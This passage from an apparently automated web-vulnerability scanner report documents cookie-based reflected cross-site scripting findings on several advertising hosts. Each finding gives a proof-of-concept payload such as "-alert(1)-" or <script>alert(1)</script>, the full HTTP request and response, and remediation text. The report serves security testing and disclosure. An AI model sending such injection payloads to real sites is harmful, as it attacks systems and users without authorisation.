Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=a9893"-alert(1)-"9508af4cd35; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^1; csi15=3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:07:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:07:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^2; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64374; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304950025^1304950025&3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:07:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2215

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=a9893"-alert(1)-"9508af4cd35\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.140. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba34e"-alert(1)-"c78825df4d5 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7856/12590/22893-2.js?cb=0.7725758128799498&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=ba34e"-alert(1)-"c78825df4d5; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:01 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:07:01 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:07:01 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64378; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^2^1304949680^1304950021&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:07:01 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2214

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=ba34e"-alert(1)-"c78825df4d5\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.141. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ffc0"-alert(1)-"2960e63a9b was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7858/13549/26630-15.js?cb=0.2465566643513739 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=2ffc0"-alert(1)-"2960e63a9b; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:26 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=2ffc0"-alert(1)-"2960e63a9b^1^1304949686^2915161843; expires=Sun, 07-Aug-2011 14:01:26 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:01:26 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:01:26 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64713; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2114

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3152064"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=2ffc0"-alert(1)-"2960e63a9b\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.142. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 422cd"-alert(1)-"e10ed0c79e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7858/13549/26630-2.js?cb=0.004363113781437278 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=422cd"-alert(1)-"e10ed0c79e; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk=7856/12590; rdk2=0; ses2=12590^1; csi2=3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:49 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64510; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3200913.js^1^1304949889^1304949889&3196046.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:04:49 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2030

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200913"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=422cd"-alert(1)-"e10ed0c79e\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.143. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26633-9.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cbb2"-alert(1)-"3197d9eb2d5 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7858/13549/26633-9.js?cb=0.8043483311776072 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=6cbb2"-alert(1)-"3197d9eb2d5; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=7858/13549; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:20 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:03:20 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 09-May-2011 15:03:20 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64599; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi9=3200914.js^1^1304949800^1304949800; expires=Mon, 16-May-2011 14:03:20 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2034

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200914"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=6cbb2"-alert(1)-"3197d9eb2d5\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.144. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8201/13264/25249-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96365"-alert(1)-"6dd04684091 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/8201/13264/25249-15.js?cb=0.48162996326573193 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=96365"-alert(1)-"6dd04684091; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:50 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8201/13264; expires=Mon, 09-May-2011 15:04:50 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:04:50 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64509; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2456

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3163599"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=96365"-alert(1)-"6dd04684091\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.145. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload ab408<script>alert(1)</script>3b5c5e16745 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&jsref=&rnd=1304949611184 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==ab408<script>alert(1)</script>3b5c5e16745; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 09 May 2011 14:00:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==ab408<script>alert(1)</script>3b5c5e16745
userid:
</div>
...[SNIP]...

3.146. http://tag.contextweb.com/TagPublish/getad.aspx [V cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d57c'-alert(1)-'4e697206eb9 was submitted in the V cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
